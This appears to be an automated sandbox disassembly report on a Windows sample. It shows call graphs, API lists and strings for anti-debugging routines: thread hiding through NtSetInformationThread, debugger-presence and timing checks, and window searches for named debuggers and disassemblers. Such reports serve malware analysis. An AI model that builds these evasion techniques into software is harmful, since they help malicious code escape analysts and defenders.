7ff735dbc75b sqrtf 16764->16765 16768 7ff735dbc7ef sqrtf 16764->16768 16769 7ff735dbc889 sqrtf 16764->16769 16770 7ff735dbc915 sqrtf 16764->16770 16765->16764 16766->16763 16767->16755 16768->16764 16769->16764 16770->16764 16772 7ff735db1f6b 16771->16772 16776 7ff735db1fc1 16771->16776 16773 7ff735db1faf 16772->16773 16774 7ff735db1f83 16772->16774 16778 7ff735da2cf0 16773->16778 16777 7ff735db1f88 __stdio_common_vfprintf 16774->16777 16776->16707 16777->16707 16787 7ff735da13d0 16778->16787 16780 7ff735da2d11 __stdio_common_vsprintf 16781 7ff735da2d4b 16780->16781 16784 7ff735da2df3 16780->16784 16785 7ff735da2d7d 16781->16785 16788 7ff735db3600 16781->16788 16783 7ff735da2da7 __stdio_common_vsprintf 16783->16784 16784->16776 16785->16783 16786 7ff735db3600 3 API calls 16785->16786 16786->16783 16787->16780 16789 7ff735db3615 malloc 16788->16789 16792 7ff735db366d 16788->16792 16791 7ff735db3641 memmove 16789->16791 16789->16792 16793 7ff735db3655 16791->16793 16794 7ff735db3667 free 16791->16794 16792->16785 16793->16794 16794->16792 15996 7ff735dd4760 GetModuleHandleA GetProcAddress VirtualProtect VirtualProtect 16009 7ff735dd4220 15996->16009 15999 7ff735dd481f QueryPerformanceFrequency QueryPerformanceCounter 16001 7ff735dd4840 15999->16001 16000 7ff735dd4809 GetCurrentThread NtSetInformationThread 16000->15999 16001->16001 16002 7ff735dd4855 QueryPerformanceCounter 16001->16002 16003 7ff735dd4ba3 16002->16003 16006 7ff735dd488e 16002->16006 16004 7ff735dea920 8 API calls 16003->16004 16005 7ff735dd4bb0 16004->16005 16007 7ff735de8990 7 API calls 16006->16007 16008 7ff735dd4b87 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16007->16008 16008->16003 16010 7ff735dec090 16009->16010 16011 7ff735dd422a ?_Random_device@std@ 16010->16011 16012 7ff735dd4260 16011->16012 16012->16012 16017 7ff735de8540 16012->16017 16015 7ff735dea920 8 API calls 16016 7ff735dd42ea LoadLibraryA GetProcAddress 16015->16016 16016->15999 16016->16000 16026 7ff735dd2230 _Query_perf_frequency _Query_perf_counter 16017->16026 16019 7ff735de8561 16020 7ff735dd2230 2 API calls 16019->16020 16021 7ff735dd42da 16019->16021 16022 7ff735de85eb Sleep 16019->16022 16023 7ff735de860a Sleep 16019->16023 16024 7ff735de8618 Sleep SleepEx 16019->16024 16020->16019 16021->16015 16022->16019 16023->16019 16024->16021 16027 7ff735dd2258 16026->16027 16027->16019 16032 7ff735de8660 16033 7ff735de869e 16032->16033 16037 7ff735de8697 16032->16037 16034 7ff735de8783 16033->16034 16038 7ff735de86b7 16033->16038 16059 7ff735dd1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 16034->16059 16036 7ff735de8788 16040 7ff735dd1360 Concurrency::cancel_current_task __std_exception_copy 16036->16040 16038->16036 16038->16037 16039 7ff735de8727 16038->16039 16042 7ff735de86c8 16038->16042 16043 7ff735deaf64 std::_Facet_Register 4 API calls 16039->16043 16047 7ff735de878e 16040->16047 16041 7ff735deaf64 std::_Facet_Register 4 API calls 16044 7ff735de86e1 16041->16044 16042->16041 16043->16037 16045 7ff735de8720 _invalid_parameter_noinfo_noreturn 16044->16045 16046 7ff735de86e9 16044->16046 16045->16039 16046->16037 16048 7ff735de87f4 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 16047->16048 16050 7ff735de87e1 16047->16050 16048->16050 16049 7ff735de88e4 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 16051 7ff735de8914 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 16049->16051 16052 7ff735de891e 16049->16052 16050->16049 16053 7ff735de8880 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 16050->16053 16054 7ff735de889e 16050->16054 16055 7ff735de8853 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 16050->16055 16056 7ff735de887d 16050->16056 16051->16052 16053->16054 16057 7ff735de88d4 16054->16057 16058 7ff735de88ae ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 16054->16058 16055->16050 16056->16053 16057->16049 16058->16054 16059->16036 16028 7ff735dd1140 __acrt_iob_func 16031 7ff735da13d0 16028->16031 16030 7ff735dd1172 __stdio_common_vfprintf 16031->16030 16060 7ff735dd583d 16061 7ff735dd5830 16060->16061 16061->16060 16062 7ff735de8990 7 API calls 16061->16062 16063 7ff735dd586a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16062->16063 16064 7ff735dd5886 GetCurrentProcess OpenProcessToken 16063->16064 16065 7ff735dd58a3 GetTokenInformation 16064->16065 16066 7ff735dd58f6 16064->16066 16067 7ff735dd58eb CloseHandle 16065->16067 16068 7ff735dd58c7 16065->16068 16069 7ff735dd4660 13 API calls 16066->16069 16067->16066 16068->16067 16070 7ff735dd5ac6 CloseHandle 16068->16070 16075 7ff735dd58fb 16069->16075 16081 7ff735dd5ae2 16070->16081 16071 7ff735dd5c86 VirtualAlloc 16072 7ff735dd5ca4 memset 16071->16072 16073 7ff735dd5ce7 SetLastError GetLastError 16071->16073 16074 7ff735dd5cc0 16072->16074 16100 7ff735dd5d02 16073->16100 16076 7ff735dd5ec6 VirtualFree 16074->16076 16080 7ff735dd5cd6 VirtualFree 16074->16080 16075->16071 16077 7ff735dd5a9f 16075->16077 16082 7ff735dd5a5c 16075->16082 16094 7ff735dd5ee8 16076->16094 16079 7ff735de8990 7 API calls 16077->16079 16078 7ff735de8990 7 API calls 16086 7ff735dd5c6a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16078->16086 16087 7ff735dd5aaa ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16079->16087 16080->16073 16081->16078 16083 7ff735dd6096 CreateToolhelp32Snapshot 16084 7ff735dd615d GetTickCount 16083->16084 16085 7ff735dd60b8 Thread32First 16083->16085 16090 7ff735dd6180 16084->16090 16088 7ff735dd6154 CloseHandle 16085->16088 16089 7ff735dd60d6 GetCurrentProcessId 16085->16089 16086->16071 16087->16070 16088->16084 16091 7ff735dd6142 Thread32Next 16089->16091 16092 7ff735dd60e2 GetCurrentThreadId 16089->16092 16090->16090 16093 7ff735dd6196 GetTickCount 16090->16093 16091->16088 16091->16089 16092->16091 16097 7ff735dd60f2 OpenThread 16092->16097 16108 7ff735dd634d 16093->16108 16117 7ff735dd61a7 16093->16117 16095 7ff735de8990 7 API calls 16094->16095 16099 7ff735dd607a ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16095->16099 16096 7ff735dd5e5c 16097->16091 16101 7ff735dd6107 LoadLibraryA GetProcAddress 16097->16101 16098 7ff735de8990 7 API calls 16102 7ff735dd5eaa ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16098->16102 16099->16083 16100->16083 16100->16096 16100->16098 16100->16100 16106 7ff735dd6139 CloseHandle 16101->16106 16107 7ff735dd6129 NtSetInformationThread 16101->16107 16102->16076 16103 7ff735dd6613 GetProcessHeap HeapSetInformation 16104 7ff735dd6635 16103->16104 16105 7ff735dd67f6 VirtualAlloc 16103->16105 16118 7ff735de8990 7 API calls 16104->16118 16109 7ff735dd69bd 16105->16109 16110 7ff735dd6818 16105->16110 16106->16091 16107->16106 16108->16103 16115 7ff735de8990 7 API calls 16108->16115 16112 7ff735dea920 8 API calls 16109->16112 16119 7ff735de8990 7 API calls 16110->16119 16111 7ff735de8990 7 API calls 16113 7ff735dd6331 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16111->16113 16114 7ff735dd69d4 16112->16114 16113->16108 16116 7ff735dd65f7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16115->16116 16116->16103 16117->16111 16120 7ff735dd67da ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16118->16120 16121 7ff735dd69a1 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 16119->16121 16120->16105 16121->16109
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: V01@$??6?$basic_ostream@CurrentD@std@@@std@@ProcessU?$char_traits@V01@@exit$DebuggerPresentThread$AddressCheckContextInformationLibraryLoadProcQueryRemotememset
                                                                                                                                                                                                              • String ID: 0000000000000000$NtQueryInformationProcess$NtSetInformationThread$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1612837944-2087985706
                                                                                                                                                                                                              • Opcode ID: 4ed9efc6c4f2838ac493c53bd34a2833aeb7ed01c3fc2b718d819662502dc039
                                                                                                                                                                                                              • Instruction ID: 8319c61a7b2af0a5a97cebe31ebc93235023aebcb3b2d7665e4d21c516b0b8c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ed9efc6c4f2838ac493c53bd34a2833aeb7ed01c3fc2b718d819662502dc039
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25E20527D39B835AF703A735A8421A4E764AFA3BC0B81D337FD5836952FF29B1815214

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 192 7ff735dd604d-7ff735dd606d 193 7ff735dd606f-7ff735dd60b2 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit CreateToolhelp32Snapshot 192->193 194 7ff735dd6040-7ff735dd604b 192->194 198 7ff735dd615d-7ff735dd6175 GetTickCount 193->198 199 7ff735dd60b8-7ff735dd60d0 Thread32First 193->199 194->192 202 7ff735dd6180-7ff735dd6194 198->202 200 7ff735dd6154-7ff735dd6157 CloseHandle 199->200 201 7ff735dd60d6-7ff735dd60e0 GetCurrentProcessId 199->201 200->198 203 7ff735dd6142-7ff735dd6152 Thread32Next 201->203 204 7ff735dd60e2-7ff735dd60f0 GetCurrentThreadId 201->204 202->202 205 7ff735dd6196-7ff735dd61a1 GetTickCount 202->205 203->200 203->201 204->203 206 7ff735dd60f2-7ff735dd6105 OpenThread 204->206 207 7ff735dd634d-7ff735dd6361 205->207 208 7ff735dd61a7-7ff735dd61be call 7ff735dd6ba0 205->208 206->203 209 7ff735dd6107-7ff735dd6127 LoadLibraryA GetProcAddress 206->209 210 7ff735dd6613-7ff735dd662f GetProcessHeap HeapSetInformation 207->210 211 7ff735dd6367-7ff735dd637e call 7ff735dd6bc0 207->211 223 7ff735dd61c4-7ff735dd61cb 208->223 224 7ff735dd6326-7ff735dd634c call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 208->224 215 7ff735dd6139-7ff735dd613c CloseHandle 209->215 216 7ff735dd6129-7ff735dd6137 NtSetInformationThread 209->216 213 7ff735dd6635-7ff735dd664c call 7ff735dd6bf0 210->213 214 7ff735dd67f6-7ff735dd6812 VirtualAlloc 210->214 230 7ff735dd6384-7ff735dd638b 211->230 231 7ff735dd65ef-7ff735dd6612 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 211->231 235 7ff735dd67cf-7ff735dd67f5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 213->235 236 7ff735dd6652-7ff735dd6659 213->236 221 7ff735dd69bd-7ff735dd69ee call 7ff735dea920 214->221 222 7ff735dd6818-7ff735dd682f call 7ff735dd6c30 214->222 215->203 216->215 244 7ff735dd6835-7ff735dd683c 222->244 245 7ff735dd6996-7ff735dd69bc call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 222->245 226 7ff735dd61d1-7ff735dd6206 223->226 227 7ff735dd62f9-7ff735dd62fc 223->227 224->207 234 7ff735dd6210-7ff735dd62f1 226->234 238 7ff735dd6300-7ff735dd6324 227->238 239 7ff735dd65b5-7ff735dd65bb 230->239 240 7ff735dd6391-7ff735dd65af 230->240 231->210 234->234 246 7ff735dd62f7 234->246 235->214 247 7ff735dd665f-7ff735dd6698 236->247 248 7ff735dd678c-7ff735dd6796 236->248 238->224 238->238 250 7ff735dd65c0-7ff735dd65ed 239->250 240->239 251 7ff735dd6842-7ff735dd6877 244->251 252 7ff735dd6969-7ff735dd696c 244->252 245->221 246->224 254 7ff735dd66a0-7ff735dd6781 247->254 255 7ff735dd67a0-7ff735dd67cd 248->255 250->231 250->250 257 7ff735dd6880-7ff735dd6961 251->257 260 7ff735dd6970-7ff735dd6994 252->260 254->254 259 7ff735dd6787-7ff735dd678a 254->259 255->235 255->255 257->257 261 7ff735dd6967 257->261 259->235 259->248 260->245 260->260 261->245
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: V01@$Thread$??6?$basic_ostream@CloseCountCurrentD@std@@@std@@HandleThread32TickU?$char_traits@V01@@exit$AddressCreateFirstInformationLibraryLoadNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                              • String ID: !$0000000000000000$NtSetInformationThread$ntdll.dll
                                                                                                                                                                                                              • API String ID: 660862461-448777732
                                                                                                                                                                                                              • Opcode ID: 069e6fc5e12bfa7b53f41c7acc4fa4b6128ee41731518dc10177068fea139a13
                                                                                                                                                                                                              • Instruction ID: 2db864938ea583ff6ae5047231fd52787ffda33c05bf1dec3b2343121e40bc81
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 069e6fc5e12bfa7b53f41c7acc4fa4b6128ee41731518dc10177068fea139a13
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2321526D39B835AF703A735A8411A4E354EFA3BC0B80D337FD1836A56FF29B1859254

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: PerformanceQuery$AddressCounterProcProtectThreadV01@Virtual$??6?$basic_ostream@CurrentD@std@@@std@@FrequencyHandleInformationLibraryLoadModuleRandom_device@std@@U?$char_traits@V01@@exit
                                                                                                                                                                                                              • String ID: IsDebuggerPresent$NtSetInformationThread$kernel32.dll$ntdll.dll
                                                                                                                                                                                                              • API String ID: 995830000-2640589995
                                                                                                                                                                                                              • Opcode ID: bcd3b558da3b6b88d0c84ca135e4b9e659e5ef62c955daa7f4b5162cba955bdd
                                                                                                                                                                                                              • Instruction ID: ef6b1a1f390dc3fa343c131d1ddc2a65abed64d1669c466b977d662175d8fb2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd3b558da3b6b88d0c84ca135e4b9e659e5ef62c955daa7f4b5162cba955bdd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36B11726D29B8347F703A735A8421A5E760EFB7B80F91D333F95836A52EF29F1815214

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DDEAB6
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA75
                                                                                                                                                                                                              • FindWindowA.USER32 ref: 00007FF735DD44BF
                                                                                                                                                                                                              • FindWindowA.USER32 ref: 00007FF735DD45F5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindWindowmemmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID: IDAVW32$IDAVW64$OLLYDBG$WinDbgFrameClass$ghidra.exe$ida.exe$ida64.exe$immunitydebugger.exe$ollydbg.exe$windbg.exe$x64dbg.exe
                                                                                                                                                                                                              • API String ID: 260637796-2758119655
                                                                                                                                                                                                              • Opcode ID: 6b267b4c2d587d262b5f3a4b2e46a1f552a5a9a6fd12e3f1921a0a78374d64fc
                                                                                                                                                                                                              • Instruction ID: aba76dba2e3ab46468d338cddf2ab62545d548d698100c3942ae92e543297101
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b267b4c2d587d262b5f3a4b2e46a1f552a5a9a6fd12e3f1921a0a78374d64fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E91B913E64BC695E710EB30D8813F9A3A1FB99748F946335E98C56955EF6CE284D300

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 334 7ff735de8660-7ff735de8695 335 7ff735de869e-7ff735de86b1 334->335 336 7ff735de8697-7ff735de8699 334->336 338 7ff735de8783-7ff735de8788 call 7ff735dd1400 335->338 339 7ff735de86b7-7ff735de86ba 335->339 337 7ff735de876b-7ff735de8782 336->337 348 7ff735de8789-7ff735de87ca call 7ff735dd1360 338->348 340 7ff735de8733-7ff735de873a 339->340 341 7ff735de86bc-7ff735de86c6 339->341 343 7ff735de873f-7ff735de8748 340->343 344 7ff735de873c 340->344 345 7ff735de86f7-7ff735de870a 341->345 346 7ff735de86c8-7ff735de86d5 341->346 349 7ff735de8763-7ff735de8767 343->349 350 7ff735de874a 343->350 344->343 352 7ff735de872c-7ff735de872f 345->352 353 7ff735de870c-7ff735de8713 345->353 351 7ff735de86d9-7ff735de86e7 call 7ff735deaf64 346->351 363 7ff735de87d3-7ff735de87df 348->363 364 7ff735de87cc-7ff735de87d2 348->364 349->337 357 7ff735de8750-7ff735de8761 350->357 365 7ff735de8720-7ff735de8726 _invalid_parameter_noinfo_noreturn 351->365 366 7ff735de86e9-7ff735de86f5 351->366 352->340 354 7ff735de8715-7ff735de871c 353->354 355 7ff735de8727 call 7ff735deaf64 353->355 354->348 359 7ff735de871e 354->359 355->352 357->349 357->357 359->351 367 7ff735de87e5-7ff735de87ed 363->367 368 7ff735de87e1-7ff735de87e3 363->368 364->363 365->355 366->352 371 7ff735de8811 367->371 372 7ff735de87ef-7ff735de87f2 367->372 370 7ff735de8813 368->370 374 7ff735de8816-7ff735de881c 370->374 371->370 372->371 373 7ff735de87f4-7ff735de880f ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ 372->373 373->374 375 7ff735de88e4-7ff735de8912 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 374->375 376 7ff735de8822-7ff735de8845 374->376 377 7ff735de8914-7ff735de891d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 375->377 378 7ff735de891e-7ff735de892d 375->378 379 7ff735de8880-7ff735de889b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 376->379 380 7ff735de8847-7ff735de884c 376->380 377->378 384 7ff735de8936-7ff735de894a 378->384 385 7ff735de892f-7ff735de8935 378->385 383 7ff735de889e 379->383 381 7ff735de88a2-7ff735de88a7 380->381 382 7ff735de884e-7ff735de8851 380->382 388 7ff735de88d4 381->388 389 7ff735de88a9-7ff735de88ac 381->389 386 7ff735de8853-7ff735de887b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 382->386 387 7ff735de887d 382->387 383->381 385->384 386->380 387->379 388->375 389->388 390 7ff735de88ae-7ff735de88d2 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 389->390 390->383
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD1400: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF735DD140B
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD1400: __std_exception_copy.VCRUNTIME140 ref: 00007FF735DD1444
                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE8789
                                                                                                                                                                                                                • Part of subcall function 00007FF735DD1360: __std_exception_copy.VCRUNTIME140 ref: 00007FF735DD13A4
                                                                                                                                                                                                              • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE87F7
                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE8864
                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE888D
                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE88BF
                                                                                                                                                                                                              • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE8903
                                                                                                                                                                                                              • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE890A
                                                                                                                                                                                                              • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE8917
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$__std_exception_copy$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Concurrency::cancel_current_taskOsfx@?$basic_ostream@V12@Xlength_error@std@@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1116575367-0
                                                                                                                                                                                                              • Opcode ID: bbc7d65fcaf90a6998d791623030b49b5e4d929c6c0049f9ce94b40985ca8bb2
                                                                                                                                                                                                              • Instruction ID: a84f75918ee52e99b08f9f6c6120fb3bdfb805aac6a988f94962a16e24cfa4b5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbc7d65fcaf90a6998d791623030b49b5e4d929c6c0049f9ce94b40985ca8bb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A781C022A18B8396EB28AF59E5C0239E7A0FB84F91F948635DE5E477A0CF3DD441D350

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
